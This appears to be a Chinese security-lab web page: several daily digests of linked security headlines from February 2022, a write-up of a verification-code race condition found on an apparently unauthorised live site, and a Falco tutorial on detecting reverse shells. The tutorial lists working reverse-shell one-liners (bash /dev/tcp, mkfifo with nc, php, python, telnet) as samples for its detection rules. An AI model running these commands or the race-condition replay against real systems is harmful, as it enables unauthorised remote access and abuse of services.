网络安全日报 2022年02月22日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究人员找到了一种解密 Hive 勒索软件加密数据的方法 https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data 2、 Xenomorph银行木马通过Google Play分发,针对 56 家欧洲银行 https://securityaffairs.co/wordpress/128253/malware/xenomorph-android-banking-trojan.html 3、SMS PVA 服务被滥用以绕过 SMS 验证机制 https://securityaffairs.co/wordpress/128242/cyber-crime/sms-pva-services.html 4、伊朗国家广播公司 IRIB 被破坏性 Wiper 恶意软件攻击 https://thehackernews.com/2022/02/iranian-state-broadcaster-irib-hits-by_21.html 5、微软警告Web3和去中心化网络上的冰式网络钓鱼威胁 https://thehackernews.com/2022/02/microsoft-warns-of-ice-phishing-threat.html 6、研究表明开源软件包中的漏洞通常需要很长时间才能修复 https://portswigger.net/daily-swig/lagging-behind-new-study-highlights-weaknesses-in-open-source-patch-process 7、CISA发布用于业务保护的免费安全工具清单 https://www.theregister.com/2022/02/18/cisa_free_security/ 8、针对乌克兰组织的DDoS攻击被归咎于俄罗斯情报部门 https://www.infosecurity-magazine.com/news/russia-prepositioning-attacks/ 9、攻击者仿冒NFT市场OpenSea向其用户发送钓鱼邮件 https://www.zdnet.com/article/opensea-scam-artists-swindle-nfts-worth-millions-in-phishing-attack/ 10、新的网络钓鱼活动针对Monzo网上银行用户 https://www.bleepingcomputer.com/news/security/new-phishing-campaign-targets-monzo-online-banking-customers/
网络安全日报 2022年02月21日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、英特尔发布软件和固件更新补丁修复了18个高危漏洞 https://www.securityweek.com/intel-software-and-firmware-updates-patch-18-high-severity-vulnerabilities 2、VMware NSX Data Center高危漏洞可能使虚拟机受到攻击 https://www.securityweek.com/vmware-nsx-data-center-flaw-can-expose-virtual-systems-attacks 3、Trickbot 操作现在由 Conti 勒索软件控制 https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html 4、UpdraftPlus 插件修复了一个高危漏洞,影响300万个站点 https://securityaffairs.co/wordpress/128170/hacking/updraftplus-forced-update.html 5、Snap包管理中发现新的 Linux 权限提升漏洞 https://securityaffairs.co/wordpress/128150/hacking/cve-2021-44731-linux-privilege-escalation.html 6、伊朗黑客利用Log4j漏洞针对VMware Horizon 部署勒索软件 https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html 7、攻击者利用Microsoft Teams传播恶意软件 https://securityaffairs.co/wordpress/128136/hacking/microsoft-teams-attack-vector.html 8、研究揭示了一种新型抗攻击量子密钥分发网络的可行性 https://www.csoonline.com/article/3650748/new-quantum-key-distribution-network-resistant-to-quantum-attacks.html 9、SonicWall在2021年检测到超过6.2亿次勒索软件攻击 https://www.infosecurity-magazine.com/news/over-620-million-ransomware/ 10、开源监控软件Zabbix中的两个漏洞允许攻击者绕过身份验证 https://portswigger.net/daily-swig/critical-vulnerabilities-in-zabbix-web-frontend-allow-authentication-bypass-code-execution-on-servers
网络安全日报 2022年02月18日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、攻击者利用 Microsoft Teams 传播恶意软件 https://securityaffairs.co/wordpress/128136/hacking/microsoft-teams-attack-vector.html 2、特制电子邮件可能使 Cisco ESA 设备崩溃 https://securityaffairs.co/wordpress/128131/hacking/cisco-esa-dos.html 3、欧洲数据保护监督机构呼吁禁止像 Pegasus 这样的间谍软件 https://securityaffairs.co/wordpress/128123/security/edps-surveillance-spyware-pegasus.html 4、攻击者利用 Zoho 漏洞入侵了红十字国际委员会 https://securityaffairs.co/wordpress/128110/hacking/nation-state-actors-hacked-red-cross-exploiting-a-zoho-bug.html 5、Trickbot 针对 60 家知名公司的客户 https://securityaffairs.co/wordpress/128087/malware/trickbot-targets-60-high-profile-companies.html 6、谷歌将隐私沙盒引入 Android 以限制用户数据的共享 https://thehackernews.com/2022/02/google-bringing-privacy-sandbox-to.html 7、Moses Staff黑客组织针对以色列进行网络间谍活动 https://thehackernews.com/2022/02/moses-staff-hackers-targeting-israeli.html 8、研究人员发现了基于Golang的新僵尸网络Kraken https://securityaffairs.co/wordpress/128116/malware/golang-kraken-botnet.html 9、印度储备银行副行长呼吁禁止加密货币 https://www.theregister.com/2022/02/16/india_cryptocurrency_ban_call/ 10、乌克兰:军事防御机构和银行正受到网络攻击 https://securityaffairs.co/wordpress/128051/hacking/ukraine-military-agencies-banks-hit-by-ddos-attacks-defacements.html
网络安全日报 2022年02月17日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、向日葵个人版for Windows存在高危命令执行漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 2、专家披露 Apache Cassandra DB RCE 的细节 https://securityaffairs.co/wordpress/128079/breaking-news/apache-cassandra-rce.html 3、VMware修复了4个在天府杯黑客大赛中披露的高危漏洞 https://securityaffairs.co/wordpress/128063/security/vmware-fixes-flaws-demonstrated-at-chinese-tianfu-cup-hacking-contest.html 4、BlackCat 团伙声称对 Swissport 勒索软件攻击负责 https://securityaffairs.co/wordpress/128039/cyber-crime/blackcat-swissport-ransomware-attack.html 5、研究人员披露了TA2541组织的一系列网络间谍活动 https://threatpost.com/ta2541-apt-rats-aviation/178422/ 6、研究人员展示了如何恢复使用像素化技术编辑过的文本 https://portswigger.net/daily-swig/new-tool-can-uncover-redacted-pixelated-text-to-reveal-sensitive-data 7、FritzFrog 僵尸网络疯狂扩张,近四成受害者在中国 https://www.freebuf.com/articles/network/321848.html 8、西班牙警方逮捕SIM卡金融欺诈犯罪团伙 https://thehackernews.com/2022/02/spanish-police-arrest-sim-swappers-who.html 9、FBI称BlackByte勒索软件入侵了3个美国关键基础设施组织 https://securityaffairs.co/wordpress/128013/malware/blackbyte-ransomware-breached-at-least-3-us-critical-infrastructure-organizations.html 10、新的MyloBot恶意软件变体发送勒索邮件 https://thehackernews.com/2022/02/new-mylobot-malware-variant-sends.html
网络安全日报 2022年02月16日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Chrome更新修复了2022年的第一个0day漏洞 https://threatpost.com/google-chrome-zero-day-under-attack/178428/ 2、乌克兰国防机构和两家国有银行遭DDoS攻击 https://securityaffairs.co/wordpress/128051/hacking/ukraine-military-agencies-banks-hit-by-ddos-attacks-defacements.html 3、虚假微软网站声称提供Windows 11以传播恶意软件 https://www.hackread.com/fake-windows-website-redline-malware-windows-11/ 4、黑客利用BGP劫持从韩国加密货币平台KLAYswap窃取约190万美元 https://therecord.media/klayswap-crypto-users-lose-funds-after-bgp-hijack/ 5、Grafana被发现存在跨站请求伪造漏洞 https://portswigger.net/daily-swig/grafana-web-security-vulnerability-opened-a-plethora-of-attack-possibilities 6、国际互联网协会由于配置错误泄露了超8万名成员的个人数据 https://portswigger.net/daily-swig/internet-society-data-leak-exposed-80-000-members-login-details 7、体育品牌美津浓遭勒索软件攻击致订单延期 https://www.freebuf.com/news/321945.html 8、修订后的《网络安全审查办法》2月14日起施行 https://www.ithome.com/0/602/836.htm 9、知乎声明:未使用“行为感知系统”监测员工 https://tech.ifeng.com/c/8DcyZPCVDn5 10、严重 Magento 零日漏洞 CVE-2022-24086 被积极利用 https://securityaffairs.co/wordpress/127999/hacking/cve-2022-24086-zero-day.html
网络安全日报 2022年02月15日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、香港海逸酒店遭网络攻击,120万客人数据遭泄露 https://www.scmp.com/news/hong-kong/law-and-crime/article/3166739/cyberattack-harbour-plaza-hotels-hong-kong-exposes 2、微软增强从内存中窃取 Windows 密码的难度 https://www.bleepingcomputer.com/news/microsoft/microsoft-is-making-it-harder-to-steal-windows-passwords-from-memory/ 3、报告称2021 年有超过 28,000 个漏洞被披露 https://www.securityweek.com/over-28000-vulnerabilities-disclosed-2021-report 4、FBI透露BlackByte勒索软件组织入侵美国关键基础设施 https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/ 6、欧洲中央银行警告可能会发生与俄罗斯有关的网络攻击 https://securityaffairs.co/wordpress/128004/breaking-news/european-central-bank-warns-russia-cyberattacks.html 7、欧洲汽车经销商Emil Frey遭到勒索软件攻击 https://www.zdnet.com/article/europes-biggest-car-dealer-hit-with-ransomware-attack/ 8、Adobe修复了其Commerce和Magento开源产品的关键漏洞 https://thehackernews.com/2022/02/critical-magento-0-day-vulnerability.html 9、上海29岁程序员离职当天“删库跑路” 被判刑10个月 https://news.mydrivers.com/1/814/814048.htm 10、因发现以太坊关键漏洞, iOS 越狱之父Jay Freeman获 200 万美元奖金 https://www.ithome.com/0/602/761.htm
网络安全日报 2022年02月14日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、2021 年,组织机构向勒索软件团伙支付了至少 6.02 亿美元 https://securityaffairs.co/wordpress/127974/cyber-crime/ransomware-payments-600m-2021.html 2、 BlackByte 勒索软件攻击了旧金山四九人球队IT网络 https://securityaffairs.co/wordpress/127961/cyber-crime/blackbyte-ransomware-hit-san-francisco-49ers.html 3、克罗地亚电话运营商 A1 Hrvatska 披露数据泄露 https://securityaffairs.co/wordpress/127919/data-breach/a1-hrvatska-data-breach.html 4、Adobe 发布针对被利用零日漏洞的紧急补丁 https://www.securityweek.com/adobe-releases-emergency-patch-exploited-commerce-zero-day 5、Maze团伙声称不再使用勒索软件并且已销毁其所有源代码 https://threatpost.com/decryptor-keys-maze-egregor-sekhmet-ransomwares/178363/ 6、攻击者利用regsvr32.exe通过Microsoft Office文档传播恶意软件 https://securityaffairs.co/wordpress/127871/hacking/attackers-adopting-regsvr32-office-documents.html 7、Moxa MXview的网络管理系统被发现存在5个漏洞 https://threatpost.com/critical-mqtt-bugs-industrial-rce-moxa/178399/ 8、数字日程安排平台FlexBooker泄露了数百万客户的数据 https://www.zdnet.com/article/amazon-steps-in-to-close-exposed-flexbooker-bucket-after-december-data-breach/ 9、数以千计的npm帐户使用域名过期的电子邮件地址 https://therecord.media/thousands-of-npm-accounts-use-email-addresses-with-expired-domains/ 10、研究人员发现乔治亚州使用的投票机存在安全漏洞 https://www.securityweek.com/feds-oppose-immediate-release-voting-machine-report
记一次重放验证码的条件竞争
https://www.yijinglab.com/expc.do?ec=ECID39ee-9db2-47bc-9fa1-29150748681b看着网站挺好怼的,于是就看了看它的验证码这一块 0x01:先看看它的正常的响应包   重复发送,做了防护。  使用常见的手法进行绕过 1.换行 –失败  2.加空格或者 + 号  失败 body=contact%3D%2013888888888%20&type%3Dgetverifycode&cmd%3D-1&data=&yzm=&encrypt=false  body=contact%3D+13888888888%20&type%3Dgetverifycode&cmd%3D-1&data=&yzm=&encrypt=false ….   3.加分号, 加逗号  --失败 body=contact%3D13888888888;13888888888&type%3Dgetverifycode&cmd%3D-1&data=&yzm=&encrypt=false   差不多可以确定是电话后面加的是非空格字符的是不会发送,直接显示手机号错误,  4.加+86  或者86  5.在常见思路都失败的情况下,我想到可不可以用数据库的空白字符去干扰它….. 有那么多空白字符 试试呗…    然后当我把线程放到30的时候,重新再跑的时候,进一步确认了这样一个问题     问题就出来了。。。按照刚才的思路,不可能是有两个验证码会发送成功的,如果发送成功,一定就是它的业务出现了问题… 那么到底是哪里出了问题了呢??? 1.最开始的时候,思考的方向出现了问题,我首先想到的是会不会是高并发的一个问题。。然后去百度,寻找到这样一个线索  感谢这位师傅的文章  可以看到,高并发漏洞应该是两个不同的操作,从而导致的问题  2.然后又跑去问团队的大师傅。大师傅给了一个提示   说实话,有往条件竞争这一块去想。。但是想到的是条件竞争的话,感觉是在上传这一块, 所以,但长见识了!!!验证码也可以条件竞争… 找个时间想想,其他漏洞会不会存在这有条件竞争…  3.新的问题又出来的 怎么去验证这样一个问题是条件竞争… 坑定不能重复这个%00 相当于直接重放这个请求包即可     把线程开到50   成功验证了。。。。 主要为了验证这个问题存在即可,不一定要把线程开得很大,把别人网站搞崩完犊子了……   总结: 1. 原来验证码可以进行条件竞争!!! 2. 挖掘得每一个过程,都需要明白大致得流程,这样才能进步,我们要明白为什么,怎么操作。加油加油 3. 愿师傅们技术更上一层楼  之所以认为是条件竞争,是因为一个大师傅这样认为过…  最后,谢谢兔哥,十二神等等….和我团队里的各位大师傅… 真正谢谢了….
网络安全日报 2022年02月11日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、攻击者入侵了500多家基于 Magento 的电商平台 https://securityaffairs.co/wordpress/127874/cyber-crime/magento-based-e-stores-mass-compromise.html 2、PHP Everywhere 插件RCE漏洞影响数千个WordPress站点 https://securityaffairs.co/wordpress/127848/hacking/rce-php-everywhere-wordpress-plugin.html 3、苹果称 WebKit 0day漏洞被用来攻击 iOS、macOS 设备 https://www.securityweek.com/apple-says-webkit-zero-day-hitting-ios-macos-devices 4、FritzFrog P2P 僵尸网络攻击医疗保健、教育和政府部门 https://thehackernews.com/2022/02/fritzfrog-p2p-botnet-attacking.html 5、俄罗斯打击了4个被盗信用卡的暗网市场 https://thehackernews.com/2022/02/russia-cracks-down-on-4-dark-web.html 6、伊朗APT组织在Out to Sea间谍活动中使用新的Marlin后门 https://thehackernews.com/2022/02/iranian-hackers-using-new-marlin.html 7、美国查获2016年Bitfinex黑客事件中被盗的价值36亿美元的加密货币 https://securityaffairs.co/wordpress/127805/cyber-crime/bitfinex-stolen-funds-seizure.html 8、Mozilla公司修复了火狐浏览器中允许获得Windows管理员权限的bug https://www.bleepingcomputer.com/news/security/mozilla-fixes-firefox-bug-letting-you-get-windows-admin-privileges/ 9、NetWalker勒索软件成员被判80个月监禁 https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/ 10、ExpressVPN提供10万美元给第一个入侵其服务器的人 https://www.bleepingcomputer.com/news/security/expressvpn-offering-100-000-to-first-person-who-hacks-its-servers/
利用Falco监控反弹Shell
前言 网络对抗愈加激烈,各种攻击手法层出不穷,在安全左移的同时,如何做到快速的应急响应,也是攻防中的一大重点。本文将以Falco为例,来达到反弹Shell的监控。 安装Falco 根据https://falco.org/docs/getting-started/installation/在centos迟迟没安装成功,提示找不到驱动,也罢,通过docker安装,并且为了快速安装,我给予了Falco容器特权,因此得注意Falco容器自身的安全性,不然就被逃逸了: docker pull falcosecurity/falco:latest 虽然宿主机Falco安装失败了,但是Falco相关的配置文件都有了,因此我把配置文件挂载到容器里,方便规则文件的更改: docker run --rm -i -t     --privileged     -v /var/run/docker.sock:/host/var/run/docker.sock     -v /dev:/host/dev     -v /proc:/host/proc:ro     -v /boot:/host/boot:ro     -v /lib/modules:/host/lib/modules:ro     -v /usr:/host/usr:ro     -v /etc:/host/etc:ro -v //etc/falco/:/etc/falco/     falcosec 可以正常运行:   反弹Shell分析 既然我们要监控反弹Shell的行为,我们就要分析对应的行为特征,我们使用我发表在TSRC的https://mp.weixin.qq.com/s/egsHOPK_S5vZujqIb3ygOQ文中的反弹Shell手段看看进程有啥特性或者共性: bash -i >& /dev/tcp/1.1.1.1/10000 0>&1    bash -c 'exec bash -i &>/dev/tcp/yourip/yourport <&1'    rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 114.67.110.37 10000 >/tmp/f    php -r '$sock=fsockopen("yourip",yourport);exec("/bin/sh -i <&3 >&3 2>&3");'    python -c 'import sys,socket,os,pty;s=socket.socket();s.connect(("yourip",yourport));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'    TF=$(mktemp -u); mkfifo $TF && telnet 127.0.0.1 1337 0<$TF | /bin/sh 1>$TF    根据上面的反弹Shell行为,发现有几个特性,或者说共性: fd有对外的socket连接,且fd.num不超过3 fd有pipe管道,且fd.num不超过4 fd.255是/dev/tty 根据综上所述,可以编写对应的规则。  编写监控规则 Falco的规则有三块内容: • Rules • Macros • Lists Rules主要是告警名称、告警介绍、告警条件、告警输出、风险等级和告警标签;Macros是自定义好的规则,可以在规则中被引用的“函数”;Lists是变量列表。 规则长下面这样:   Falco默认也自带了一些规则,比如我们docker exec进入容器的时候,会有告警提示:    根据上述反弹Shell分析,如果bash、zsh这些进程的fd出现socket连接,肯定有问题,而且常见的bash反弹都是用的重定向,那我们就可以编写对应的规则: - list: shell_binaries   items: [ash, bash, csh, ksh, sh, tcsh, zsh, dash] - rule: Shell Binary Reverse shell   desc: Bash、Zsh etc. have network connection,May be Reverse Shell   condition: evt.type=dup and proc.name in (shell_binaries) and container and fd.num in (0, 1, 2, 3) and fd.type in ("ipv4", "ipv6")   output: >     Reverse shell connection (user=%user.name %container.info process=%proc.name proc.pid=%proc.pid parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip fd.rip=%fd.rip)   priority: emergency   tags: [container, reverse_shell, mitre_execution]   append: false 上述规则代表如果存在重定向、进程是bash、zsh这些、在容器内、fd的num是0、1、2、3中的一个、fd类型是ipv4或者ipv6,可以看到成功的监控到反弹Shell行为:   但是这样很容易被绕过,主要执行的进程不是shell_binaries里的就行,就比如上面的telnet、python反弹Shell的方式。因此我们可以删掉上面提到的shell_binaries,不管是不是bash这些,只要fd 0 1 2 3有socket连接就行: - rule: Any Binary fd 0-3 Have Network Connection   desc: Any Binary fd 0-3 have network connection   condition: evt.type=connect and container and fd.num in (0, 1, 2, 3) and fd.type in ("ipv4", "ipv6")   output: >     Any Binary fd 0-3 Have Network Connection (user=%user.name %container.info process=%proc.name proc.pid=%proc.pid parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.si   priority: warning   tags: [container, fd03_network]   append: false   继续根据上面的反弹Shell分析,发现telnet这样的反弹Shell,会有管道pipe的产生,因此我们继续完善我们的告警,添加Pipe: - rule: Shell Binary Pipe   desc: Bash、Zsh etc. have Pipe,May be Reverse Shell   condition: evt.type=dup and proc.name in (shell_binaries) and container and fd.num in (0, 1, 2, 3) and fd.type="pipe"   output: >     Reverse shell connection(PIPE) (user=%user.name %container.info process=%proc.name parent=%proc.pname proc.pid=%proc.pid cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip fd.rip=%f   priority: emergency   tags: [container, reverse_shell, pipe, mitre_execution]   append: false   fd.255是/dev/tty也可以加个: - rule: fd.255 = tty   desc: fd.255 = tty   condition: evt.type=connect and container and fd.num=255 and fd.name='/dev/tty'   output: >     fd.255 = tty (user=%user.name %container.info process=%proc.name parent=%proc.pname proc.pid=%proc.pid cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip fd.rip=%fd.rip)   priority: warning   tags: [container, fd255_tty]   append: false  总结 本文利用Falco进行了反弹Shell的监控,虽然大多数的反弹行为都可以被监控到,但是可能存在各种各样的误报、漏报,安全任重道远。 实验推荐 实验:反弹shell的N种姿势(蚁景网安实验室) https://www.yijinglab.com/expc.do?ec=ECID5176-f1a3-433a-b3a2-a7ff4eab2d1d
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页